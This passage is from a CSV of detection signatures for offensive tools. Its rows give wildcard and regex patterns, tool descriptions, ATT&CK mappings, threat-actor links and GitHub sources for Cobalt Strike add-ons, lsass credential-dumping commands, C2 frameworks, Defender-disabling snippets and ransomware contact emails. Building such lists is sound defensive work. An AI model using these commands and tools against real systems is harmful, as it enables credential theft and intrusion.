"*taskkill -f /im crack.exe*",".{0,1000}taskkill\s\-f\s\/im\scrack\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61004"
"*taskkill -f /im frpc.exe*",".{0,1000}taskkill\s\-f\s\/im\sfrpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61005"
"*taskkill -f /im iox.exe*",".{0,1000}taskkill\s\-f\s\/im\siox\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61006"
"*taskkill -f /im lazagne.exe*",".{0,1000}taskkill\s\-f\s\/im\slazagne\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61007"
"*taskkill -f /im modify.exe*",".{0,1000}taskkill\s\-f\s\/im\smodify\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61008"
"*taskkill -f /im npc.exe*",".{0,1000}taskkill\s\-f\s\/im\snpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61009"
"*taskkill -f /im scrying.exe*",".{0,1000}taskkill\s\-f\s\/im\sscrying\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","61010"
"*tasklist /fi *Imagename eq lsass.exe*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","61029"
"*tasklist /fi *Imagename eq lsass.exe*do procdump*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}do\sprocdump.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","61031"
"*TaskShell.exe * -b *.exe*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","61038"
"*TaskShell.exe * -s *SYSTEM*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-s\s.{0,1000}SYSTEM.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","0","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","61039"
"*tastypepperoni/PPLBlade*",".{0,1000}tastypepperoni\/PPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","61040"
"*tastypepperoni/RunAsWinTcb*",".{0,1000}tastypepperoni\/RunAsWinTcb.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","N/A","10","2","132","17","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z","61041"
"*TaurusOmar/psobf*",".{0,1000}TaurusOmar\/psobf.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","1","N/A","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","61042"
"*tbMangler.py encode *",".{0,1000}tbMangler\.py\sencode\s.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","61043"
"*TcbS4uImpersonationVariant.exe*",".{0,1000}TcbS4uImpersonationVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","61044"
"*tCommand = ""windowsdefender://Threatsettings""*CreateObject(""Shell.Application"").ShellExecute(tCommand)*",".{0,1000}tCommand\s\=\s\""windowsdefender\:\/\/Threatsettings\"".{0,1000}CreateObject\(\""Shell\.Application\""\)\.ShellExecute\(tCommand\).{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61045"
"*TCP:gsocket:31337*",".{0,1000}TCP\:gsocket\:31337.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","61047"
"*tcpClient.connectTCP(*127.0.0.1*1337*",".{0,1000}tcpClient\.connectTCP\(.{0,1000}127\.0\.0\.1.{0,1000}1337.{0,1000}","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","N/A","4","386","100","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z","61048"
"*tcpreplay*",".{0,1000}tcpreplay.{0,1000}","offensive_tool_keyword","tcpreplay","Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems. it has seen many evolutions including capabilities to replay to web servers.","T1043 - T1049 - T1052 - T1095 - T1102 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://tcpreplay.appneta.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61050"
"*tcpshell.py*",".{0,1000}tcpshell\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","61051"
"*tdragon6/Supershell*",".{0,1000}tdragon6\/Supershell.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","61052"
"*teamchic@exploit.im*",".{0,1000}teamchic\@exploit\.im.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61054"
"*teamchic@jabb.im*",".{0,1000}teamchic\@jabb\.im.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61055"
"*teamchic@yandex.com*",".{0,1000}teamchic\@yandex\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61056"
"*teamchica@yandex.com*",".{0,1000}teamchica\@yandex\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","61057"
"*TeamFiltration.exe *",".{0,1000}TeamFiltration\.exe\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61058"
"*TeamFiltration\Program.cs*",".{0,1000}TeamFiltration\\Program\.cs.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61059"
"*TeamFiltration-v*-linux-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-linux\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","#linux","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61060"
"*TeamFiltration-v*-macOS-arm64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-arm64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61061"
"*TeamFiltration-v*-macOS-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-macOS\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61062"
"*TeamFiltration-v*-win-x86_64.zip*",".{0,1000}TeamFiltration\-v.{0,1000}\-win\-x86_64\.zip.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","61063"
"*teams_dump.py teams*",".{0,1000}teams_dump\.py\steams.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","61064"
"*teams_dump-main.zip*",".{0,1000}teams_dump\-main\.zip.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","61065"
"*teamserver * c2-profiles/*",".{0,1000}teamserver\s.{0,1000}\sc2\-profiles\/.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","61066"
"*teamserver* no_evasion.profile*",".{0,1000}teamserver.{0,1000}\sno_evasion\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","0","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","61067"
"*teamServer*ZoomAPI.py*",".{0,1000}teamServer.{0,1000}ZoomAPI\.py.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","61068"
"*TeamServer.C2Profiles*",".{0,1000}TeamServer\.C2Profiles.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","61069"
"*TeamServer.exe *github.com*",".{0,1000}TeamServer\.exe\s.{0,1000}github\.com.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","61070"
"*Teamserver.exe -c profile.json*",".{0,1000}Teamserver\.exe\s\-c\sprofile\.json.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","61071"
"*TeamServer.prop*",".{0,1000}TeamServer\.prop.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 